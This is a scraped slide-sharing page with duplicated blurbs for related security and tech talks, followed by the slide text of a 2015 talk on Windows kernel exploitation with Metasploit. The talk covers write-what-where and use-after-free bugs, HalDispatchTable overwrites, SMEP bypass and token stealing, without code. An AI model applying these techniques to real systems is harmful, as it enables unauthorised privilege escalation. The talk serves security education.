The document discusses kernel exploitation on Windows systems. It provides an overview of common vulnerability classes like write-what-where and use-after-free. It also covers techniques for executing code, mitigation technologies, writing exploits for Metasploit, and sources of instability. The speaker's background and agenda are introduced at the start.
The purpose of this document
is not to show how to use Metasploit tool there are enormous amount of sources available to do that but to show you how to look deeper into the code and try to decipher how the various classes and modules hang
together to produce the various functions we love to use.
In doing so we will learn how the exploit framework could be structured, how the interaction between the
attacker and the exploited vulnerability could be
achieved and how the user can extend the functionality of Metasploit.
The tool has been developed to be used inside a Linux environment. At the host system level, the only prerequisites are support for Python 2,7 or higher and the Android SDK.
Injection on Steroids: Codeless code injection and 0-day techniquesenSilo
Most nefarious activities carried out by malware—such as running code in Internet Explorer in an attempt to steal passwords, hijack sessions, or conduct Man-in-the-Browser fraud, require code injection.
This session exposes additional new user- and kernel-mode injection techniques. One of these techniques we’ve coined as “code-less code injection” since, as opposed to other known injection techniques, does not require adding code to the injected process.
The purpose of this document
is not to show how to use Metasploit tool there are enormous amount of sources available to do that but to show you how to look deeper into the code and try to decipher how the various classes and modules hang
together to produce the various functions we love to use.
In doing so we will learn how the exploit framework could be structured, how the interaction between the
attacker and the exploited vulnerability could be
achieved and how the user can extend the functionality of Metasploit.
The tool has been developed to be used inside a Linux environment. At the host system level, the only prerequisites are support for Python 2,7 or higher and the Android SDK.
Injection on Steroids: Codeless code injection and 0-day techniquesenSilo
Most nefarious activities carried out by malware—such as running code in Internet Explorer in an attempt to steal passwords, hijack sessions, or conduct Man-in-the-Browser fraud, require code injection.
This session exposes additional new user- and kernel-mode injection techniques. One of these techniques we’ve coined as “code-less code injection” since, as opposed to other known injection techniques, does not require adding code to the injected process.
Captain Hook: Pirating AVs to Bypass Exploit MitigationsenSilo
In this talk we reveal six(!) different security issues that we uncovered in various hooking engines. The vulnerabilities we found enable a threat actor to bypass the security measures of the underlying operating system. As we uncovered the vulnerabilities one-by-one we found them to impact commercial engines, such as Microsoft’s Detours, open source engines such as EasyHook and proprietary engines such as those belonging to TrendMicro, Symantec, Kaspersky and about twenty others.
As computer systems become more sophisticated, process injection techniques also evolve. These techniques are notorious for their use by "malicious software" to hide code execution and avoid detection. In this presentation we dive deep into the Windows runtime and we demonstrate these techniques. Besides, we also learn how to code construction and design patterns that relate to perform hidden code can recognize.
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
CNIT 126: 10: Kernel Debugging with WinDbgSam Bowne
Slides for a college course at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_F19.shtml
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
Decades history of kernel exploitation, however still most used techniques are such as ROP. Software based approaches comes finally challenge this technique, one more successful than the others. Those approaches usually trying to solve far more than ROP only problem, and need to handle not only security but almost more importantly performance issues. Another common attacker vector for redirecting control flow is stack what comes from design of today’s architectures, and once again some software approaches lately tackling this as well. Although this software based methods are piece of nice work and effective to big extent, new game changing approach seems coming to the light. Methodology closing this attack vector coming right from hardware - intel. We will compare this way to its software alternatives, how one interleaving another and how they can benefit from each other to challenge attacker by breaking his most fundamental technologies. However same time we go further, to challenge those approaches and show that even with those technologies in place attackers is not yet in the corner.
Kernel vulnerabilities was commonly used to obtain admin privileges, and main rule was to stay in kernel as small time as possible! But nowdays even when you get admin / root then current operating systems are sometimes too restrictive. And that made kernel exploitation nice vector for installing to kernel mode!
In this talk we will examine steps from CPL3 to CPL0, including some nice tricks, and we end up with developing kernel mode drivers.
Captain Hook: Pirating AVs to Bypass Exploit MitigationsenSilo
In this talk we reveal six(!) different security issues that we uncovered in various hooking engines. The vulnerabilities we found enable a threat actor to bypass the security measures of the underlying operating system. As we uncovered the vulnerabilities one-by-one we found them to impact commercial engines, such as Microsoft’s Detours, open source engines such as EasyHook and proprietary engines such as those belonging to TrendMicro, Symantec, Kaspersky and about twenty others.
As computer systems become more sophisticated, process injection techniques also evolve. These techniques are notorious for their use by "malicious software" to hide code execution and avoid detection. In this presentation we dive deep into the Windows runtime and we demonstrate these techniques. Besides, we also learn how to code construction and design patterns that relate to perform hidden code can recognize.
Recently our team researched various ntos subsystem attack vectors, and one of the outputs we will present in our talk. DeathNote as our internal code name to this component, which resides in Microsoft Windows kernel, hiding behind different interfaces and exposed to user differently.
What can goes bad with it?
Basically two kinds of problems, one is syscall handling via direct user interaction. We will describe how to obtain basic understanding of what's going on, how it interacts with other components and what is its purpose. With those knowledge we will dig deeper how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in Windows kernel, and demonstrate some of them.
And as for second, as it hints from title, this module does bit of data parsing, so we will dive deep into internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanism. We will show how some tricks can outcome with various results, and how structured approach can expose more problems than is expected.
CNIT 126: 10: Kernel Debugging with WinDbgSam Bowne
Slides for a college course at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_F19.shtml
Ice Age melting down: Intel features considered usefull!Peter Hlavaty
Decades history of kernel exploitation, however still most used techniques are such as ROP. Software based approaches comes finally challenge this technique, one more successful than the others. Those approaches usually trying to solve far more than ROP only problem, and need to handle not only security but almost more importantly performance issues. Another common attacker vector for redirecting control flow is stack what comes from design of today’s architectures, and once again some software approaches lately tackling this as well. Although this software based methods are piece of nice work and effective to big extent, new game changing approach seems coming to the light. Methodology closing this attack vector coming right from hardware - intel. We will compare this way to its software alternatives, how one interleaving another and how they can benefit from each other to challenge attacker by breaking his most fundamental technologies. However same time we go further, to challenge those approaches and show that even with those technologies in place attackers is not yet in the corner.
Kernel vulnerabilities was commonly used to obtain admin privileges, and main rule was to stay in kernel as small time as possible! But nowdays even when you get admin / root then current operating systems are sometimes too restrictive. And that made kernel exploitation nice vector for installing to kernel mode!
In this talk we will examine steps from CPL3 to CPL0, including some nice tricks, and we end up with developing kernel mode drivers.
You didnt see it’s coming? "Dawn of hardened Windows Kernel" Peter Hlavaty
Past few years our team was focusing on different operating systems including Microsoft windows kernel. Honestly our first pwn at Windows kernel was not that challenging. Number of available targets with friendly environment for straightforward pwn, from user up to reliable kernel code execution.
However, step by step, security policies continue to evolve, and it becomes more troublesome to choose ideal attack surface from various sandboxes. In addition, what steps to follow for digging security holes is highly dependent upon the chosen target. In general, a few common strategies are available for researchers to choose: e.g choose “unknown” one which hasn’t been researched before; Select well fuzzed or well audited one, or research on kernel module internals to find “hidden” attack surfaces which are not explicitly interconnected. In the first part of the talk we introduce our methodology of selecting, alongside with cost of tricks around to choose seemingly banned targets, illustrated by notable examples.
After getting hands on potential bug available from targeted sandbox, it is time for Microsoft windows taking hardening efforts to put attacker into corner. Strong mitigations are being introduced more frequently than ever, with promising direction which cuts lots of attack surface off, and a several exploitation techniques being killed. We will show difficulties of developing universal exploitation techniques, and demonstrate needed technical level depending on code quality of target. We will examine how different it becomes with era of Redstone and following versions even with those techniques and good vulnerability in hand. How it changed attacker landscape and how it will (and will not) kill those techniques and applications. However will it really change the game or not?
Kernel Mode Threats and Practical DefensesPriyanka Aash
Recent advancements in OS security from Microsoft such as PatchGuard, Driver Signature Enforcement, and SecureBoot have helped curtail once-widespread commodity kernel mode malware such as TDL4 and ZeroAccess. However, advanced attackers have found ways of evading these protections and continue to leverage kernel mode malware to stay one step ahead of the defenders. We will examine the techniques from malware such as DoublePulsar, SlingShot, and Turla that help attackers evade endpoint defenses. We will also reveal a novel method to execute a fully kernel mode implant without hitting disk or being detected by security products. The method builds on publicly available tools which makes it easily within grasp of novice adversaries.
While attacker techniques have evolved to evade endpoint protections, the current state of the art in kernel malware detection has also advanced to hinder these new kernel mode threats. We will discuss these new defensive techniques to counter kernel mode threats, including real-time detection techniques that leverage hypervisors along with an innovative hardware assisted approach that utilizes performance monitoring units. In addition, we will discuss on-demand techniques that leverage page table entry remapping to hunt for kernel malware at scale. To give defenders a leg up, we will release a tool that is effective at thwarting advanced kernel mode threats. Kernel mode threats will only continue to grow in prominence and impact. This talk will provide both the latest attacker techniques in this area, and a new tool to curtail these attacks, proving real-world strategies for immediate implementation.
stackconf 2020 | Replace your Docker based Containers with Cri-o Kata Contain...NETWAYS
They provide the workload isolation and security advantages of VMs. but at the same time maintain the speed of deployment and usability of containers.by using kata containers, instead of namespace, small virtual machines are created on the kernel and be strongly isolated. The technology of Kata Containers is based on KVM hypervisor. That’s why the level of isolation is equivalent to typical hypervisors. This session will focus on a live production phase when choosing kata instead of docker, and why they are preferable
Although containers provides software-level isolation of resources, the kernel needs to be shared. That’s why the isolation level in terms of security is not so high when compared with hypervisors.This learns to shift from Docker as the de facto standard to Kata containers and learn how to obtain higherl level of security
Security research over Windows #defcon chinaPeter Hlavaty
Past several years Microsoft Windows undergo lot of fundamental security changes. Where one can argue still imperfect and bound to tons of legacy issues, on the other hand those changes made important shifts in attacker perspective. From tightened sandboxing, restricting attack surface, introducing mitigations, applying virtualization up to stronger focus even on win32k. In our talk we will go trough those changes, how it affects us and how we tackle them from choosing targets, finding bugs up to exploitation primitives we are using. While also empathize that windows research is not only about sandbox, and there are many more interesting target to look for.
Latest (storage IO) patterns for cloud-native applications OpenEBS
Applying micro service patterns to storage giving each workload its own Container Attached Storage (CAS) system. This puts the DevOps persona within full control of the storage requirements and brings data agility to k8s persistent workloads. We will go over the concept and the implementation of CAS, as well as its orchestration.
Blocks is a cool concept and is very much needed for performance improvements and responsiveness. GCD helps run blocks effortlessly by scheduling on a desired queue, priority and lots more.
CNIT 126: 10: Kernel Debugging with WinDbgSam Bowne
Slides for a college course at City College San Francisco. Based on "Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software", by Michael Sikorski and Andrew Honig; ISBN-10: 1593272901.
Instructor: Sam Bowne
Class website: https://samsclass.info/126/126_F18.shtml
Bridging the Semantic Gap in Virtualized EnvironmentAndy Lee
In virtualization, it is difficult to interpreting the low level state of a VM into high level semantic state of guest OS.
This will be a obstacle for system administrator to real-time observe, inspect and detect the runtime execution of a VM.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
GraphRAG is All You need? LLM & Knowledge GraphGuy Korland
Guy Korland, CEO and Co-founder of FalkorDB, will review two articles on the integration of language models with knowledge graphs.
1. Unifying Large Language Models and Knowledge Graphs: A Roadmap.
https://arxiv.org/abs/2306.08302
2. Microsoft Research's GraphRAG paper and a review paper on various uses of knowledge graphs:
https://www.microsoft.com/en-us/research/blog/graphrag-unlocking-llm-discovery-on-narrative-private-data/
DevOps and Testing slides at DASA ConnectKari Kakkonen
My and Rik Marselis slides at 30.5.2024 DASA Connect conference. We discuss about what is testing, then what is agile testing and finally what is Testing in DevOps. Finally we had lovely workshop with the participants trying to find out different ways to think about quality and testing in different parts of the DevOps infinity loop.
State of ICS and IoT Cyber Threat Landscape Report 2024 previewPrayukth K V
The IoT and OT threat landscape report has been prepared by the Threat Research Team at Sectrio using data from Sectrio, cyber threat intelligence farming facilities spread across over 85 cities around the world. In addition, Sectrio also runs AI-based advanced threat and payload engagement facilities that serve as sinks to attract and engage sophisticated threat actors, and newer malware including new variants and latent threats that are at an earlier stage of development.
The latest edition of the OT/ICS and IoT security Threat Landscape Report 2024 also covers:
State of global ICS asset and network exposure
Sectoral targets and attacks as well as the cost of ransom
Global APT activity, AI usage, actor and tactic profiles, and implications
Rise in volumes of AI-powered cyberattacks
Major cyber events in 2024
Malware and malicious payload trends
Cyberattack types and targets
Vulnerability exploit attempts on CVEs
Attacks on counties – USA
Expansion of bot farms – how, where, and why
In-depth analysis of the cyber threat landscape across North America, South America, Europe, APAC, and the Middle East
Why are attacks on smart factories rising?
Cyber risk predictions
Axis of attacks – Europe
Systemic attacks in the Middle East
Download the full report from here:
https://sectrio.com/resources/ot-threat-landscape-reports/sectrio-releases-ot-ics-and-iot-security-threat-landscape-report-2024/
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
Neuro-symbolic is not enough, we need neuro-*semantic*Frank van Harmelen
Neuro-symbolic (NeSy) AI is on the rise. However, simply machine learning on just any symbolic structure is not sufficient to really harvest the gains of NeSy. These will only be gained when the symbolic structures have an actual semantics. I give an operational definition of semantics as “predictable inference”.
All of this illustrated with link prediction over knowledge graphs, but the argument is general.
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
PHP Frameworks: I want to break free (IPC Berlin 2024)Ralf Eggert
In this presentation, we examine the challenges and limitations of relying too heavily on PHP frameworks in web development. We discuss the history of PHP and its frameworks to understand how this dependence has evolved. The focus will be on providing concrete tips and strategies to reduce reliance on these frameworks, based on real-world examples and practical considerations. The goal is to equip developers with the skills and knowledge to create more flexible and future-proof web applications. We'll explore the importance of maintaining autonomy in a rapidly changing tech landscape and how to make informed decisions in PHP development.
This talk is aimed at encouraging a more independent approach to using PHP frameworks, moving towards a more flexible and future-proof approach to PHP development.
Key Trends Shaping the Future of Infrastructure.pdfCheryl Hung
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Metasploit & Windows Kernel Exploitation
1. Metasploit & Windows Kernel Exploitation
Spencer (@zeroSteiner) McIntyre BSides Cleveland Saturday June 20th, 2015
2. Agenda
• Agenda
• Kernel Exploitation Overview & Basics
• Common Vulnerability Classes
• Executing Code
• Mitigation Technologies
• Kernel Exploits in MSF
• Writing Windows Kernel exploits for MSF
• Common Techniques Employed By MSF Modules
• Improving Reliability
3. About Me
• Spencer McIntyre
• Work at SecureState
• Research, Development, “Special” Projects
• BSOD-inducer
• Avid open source contributor
• Metasploit among others
• Python enthusiast
• I can haz acronyms?
• OSCP, OSEE
4. BSOD Warning
• BSODs are imminent
• None of the solutions here are fit-all
• Just aggregated from personal experience
Bug check from MS14-040 due to corrupted structures
6. Overview
• Why Kernel Exploitation?
• Downward trend of RCE over last couple years
• Last “Great” RCE MS08-067
• New RCE are generally in 3rd party software / libraries
• The kernel is always there
• Upward trend of client side exploitation as a foothold
• Social engineering
• Some great vulnerabilities coming from Pwn2Own and the wild
7. Recent Windows Kernel Vulnerabilities
Name Advisory / Details Released Public Exploit Code?
MS14-058 / CVE-2014-4113 October 14th, 2014 Yes
MS14-070 / CVE-2014-4076 November 11th, 2014 Yes
MS15-010 February 10th, 2015 Yes
MS15-034 / CVE-2015-1635 April 14th, 2015 Yes (DoS)
MS15-051 / CVE-2015-1701 April 18th, 2015 Yes
• Incomplete list of recent “notable” vulnerabilities as of June 15th, 2015
• Notable because additional details were published outside the MSB / CVE
boilerplate verbiage
8. Common Vulnerability Classes
• Write-What-Where
• NULL Pointer Dereference
• Use After Free (UAF)
• Honorable Mention: Stack Buffer Overflow
• Exist, but not particularly common in Kernel land
9. Write-What-Where
• (Sometimes) Controlled data can be written to an attacker-
controlled location
• nt!HalDispatchTable is a popular target
• Exploitation is often stable
• Commonly exploited with IOCTL routines using
NtDeviceIoControlFile
• Also more common than other classes in third party drivers
• Example exploits:
• MS11-080
• MS14-070
10. NULL Pointer Dereference
• Occurs when a NULL pointer is referred to as an object
• Exploitation is often stable
• NULL page can not always be mapped, mitigations exist
• Sometimes negative numbers from error statuses are used as pointers
• MS14-058 / CVE-2014-4113 for example
• Can be beneficial on 64-bit systems if truncated to a 32-bit number (resulting in
0x00000000ffffffff being used)
• Example Exploits:
• MS13-081
• MS14-058
11. Use After Free
• Pointer to an object is used after it has been freed
• Successful exploitation often requires re-allocating the freed object
• Not always reliable, depends on successful reallocation
• Examples:
• MS15-020
12. Vulnerability To Code Execution
• Techniques dependent on class
• Write-What-Where
• Well documented, overwrite nt!HalDispatchTable+0x4
• HalDispatchTable can be resolved from the ntkrnlpa.exe
• Triggered on demand with NtQueryIntervalProfile
• NULL Pointer Dereference & UAF
• Similar in the sense that they are object-dependent
• UAF is more difficult to set up the object (not in user-land address space)
13. NULL Pointer Dereference / UAF
• An object is corrupted
• For UAF a replacement object is created
• No easy way to determine a suitable object
• Object size, layout and destination heap all must be considered
• Object needs to provide a primitive
• Generally Write-What-Where or Call
14. Useful Object: tagWND (Window)
• win32k!tagWND
• Pretty common object (CVE-2014-4113)
• Set two values for kernel code execution
• bServerSideWindowProc (Bit flag)
• lpfnWndProc (Pointer)
• Callback function can be triggered on demand
15. Mitigation Technologies
• Commonly encountered on modern systems
• The days of jmp-esp died with XP
• Address Space Layout Randomization (ASLR)
• Only a semi-issue due to already having code execution
• Only need to worry about kernel addresses
• Driver bases can be determined
• Memory leaks or read primitives can disclose additional kernel addresses
• LoadLibrary & GetProcAddress are your friends
• Data Execution Prevention (DEP)
• NtAllocateVirtualMemory, VirtualProtect
• SMEP can be an issue (more on this later)
16. Mitigation Technologies
• NULL Page Mapping
• One of the oldest protections in EMET
• Pre-Allocate and squat on the page, mark with PAGE_NOACCESS
• Get around it by avoiding it (migrate into an unprotected process if
possible)
• Supervisor Mode Execution Protection (SMEP)
• Prevents user-land addresses from being executed from the Kernel
context
• Originally developed by Intel
• Support added to Windows 8
18. Disabling SMEP
• Some well-documented techniques
• See the “Further Reading & Resources” slide
• Use a ROP gadget in nt!KiConfigureDynamicProcessor to clear the
SMEP bit in the CR4 register
• Resolve the kernel address of the ROP gadget
• A few drawbacks to this approach
• Can’t be resolved with GetProcAddress like nt!HalDispatchTable
• Its in the PAGELK section on Windows 8.1
• Requires running in the native architecture, i.e. not WOW64
• If the kernel can’t be loaded (WOW64 or sandbox) a read primitive
needs to be available for resolution
20. Metasploit Windows Kernel Modules
• Divided into two categories based on implementation
• Ruby (relying heavily on RailGun)
• C (implemented as a Reflectively-loadable DLL)
• Don’t have to be local privilege escalation but almost all are
• Almost all directly steal / duplicate the token
• An alternative approach is to “clear” the ACL of a SYSTEM process to
inject into (e.g. ms13_053_schlamperei)
• Msf::Exploit::Local::WindowsKernel mixin for convenience
methods
21. Ruby Implementations
• Might be eventually deprecated in favor of RDLL1
• Well suited for simple NtDeviceIoControlFile-centric exploits
• e.g. MS11-080, MS14-002, MS14-070
• Benefits are that the exploit is a self-contained ruby file
• Failed attempts result in a lost session due to self-corruption
1 Details in issue #4715 https://github.com/rapid7/metasploit-framework/issues/4715
22. C Implementations
• Much more flexible
• Threads can be used
• Can be faster to write if extensive Windows API calls are necessary
• PoC exploits can be developed as standalone executables
• Primary benefit is the exploit can be injected into a dummy
process
• Results in stability if the exploit fails without a BSOD
23. Writing a Kernel Exploit for Metasploit
• C / Reflective DLL style is preferred
• General Steps:
1. Environment detection
• Is the session a meterpreter or running as SYSTEM?
2. Vulnerability check
• Often implemented in the “check” function, result is verified
• Checks are often for the file version and running services
3. Start a dummy process to host the malicious DLL
• If in a sandbox, load the DLL in the session process
4. The RDLL will (hopefully) exploit the vulnerability successfully and open
a new session
24. Shellcode
• Options are traditional raw bytecode or C,
but only for RDLLs
• C implementation is preferable and more
reliable
• Different version of Windows have
different token offsets
• Generic implementation uses
PsLookupProcessByProcessId then find
and replace
• Works across Windows versions
26. Sources of Instability
• Corrupted structures
• Token reference count
• Returning control after elevation
27. Corrupted Structures
• Certain objects are in a shared region between user & kernel lands1
• Handle table information without a system call for efficiency
• user32!gSharedInfo is available since Windows 7
• Region is read-only
• Back it up
• Read-only so restore from within the shellcode
• If structures are corrupted and code execution does not occur a BSOD
is imminent without a reliable write primitive
• nt!HalDispatchTable
1https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf
28. Token Reference Count
• “Stealing” the token can cause issues
• Token object has a reference count
• Possible workarounds
• Clear an ACL from a process
• Process still might die and cause instability
• Duplicate the token
• Not practical from raw shellcode
• Backup original token, Steal the token, Spawn a new shell, Restore the token
• Is practical from raw shellcode
• Exploit must be reliably triggered twice
29. Returning Control
• What to do if process dies after elevation?
• Find a suitable location to return control to
• Unwind the stack via assembly
• Microsoft uses a standard calling convention
• Not applicable in every situation, depends on the call
• Trivial to differentiate a user-land address vs kernel-land
30. Returning Control
• Last call in user-land ntdll!KiFastSystemCallRet
• First call in kernel-land nt!KiSystemServicePostCall
• KiSystemServicePostCall performs cleanup
operations and restores the user-mode context
• Can not directly return to user-land
• System call will probably fail but the status can be
set
• Be careful about allowing it to succeed
32. 64-bit Exploitation
• Starting to pick up
• Exploits being written in C to support both architectures
• x64 uses one calling convention, only one
• WOW64 complicates things
• For Metasploit, migrate into or spawn a native process
• Check for pointer truncation
• Might help, might not
33. Closing Thoughts
• Kernel exploitation is flexible
• Code execution ahead of time can be leveraged
• Size matters not
• Hypothesis: Kernel exploitation is going to stick around for a while
35. Further Reading & Resources
• Kernel Attacks Through User-Mode Callbacks
• Tarjei Mandt, Black Hat USA 2011
• https://media.blackhat.com/bh-us-11/Mandt/BH_US_11_Mandt_win32k_WP.pdf
• SMEP: What is it, and how to beat it on Windows
• Mateusz ‘j00ru’ Jurczyk & Gynvael Coldwind
• http://j00ru.vexillium.org/?p=783
• Windows Kernel Exploitation Basics - Part 2 : Arbitrary Memory Overwrite
exploitation using HalDispatchTable
• dimanche , July 17th, 2011
• http://poppopret.blogspot.com/2011/07/windows-kernel-exploitation-basics-part.html
• Polishing Chrome for Fun and Profit
• Nils & Jon, August 29th, 2013
• https://labs.mwrinfosecurity.com/system/assets/538/original/mwri_polishing-chrome-
slides-nsc_2013-09-06.pdf
36. Further Reading & Resources
• Pwn2Own 2014: AFD.sys Dangling Pointer Vulnerability
• Sebastian Apelt, July 11th, 2014
• http://www.siberas.de/papers/Pwn2Own_2014_AFD.sys_privilege_escalation
.pdf
• One-Bit To Rule Them All: Bypassing Windows’ 10 Protections using a
Single Bit
• Udi Yavo, Februrary 10th, 2015
• http://breakingmalware.com/vulnerabilities/one-bit-rule-bypassing-windows-
10-protections-using-single-bit/
37. • Spencer McIntyre
• Twitter: @zeroSteiner
• Checkout “Phishing Without Ruby”
• I’ll be co-presenting with Brandan Geise
• Downstairs at 4PM
Thank You For Your Time!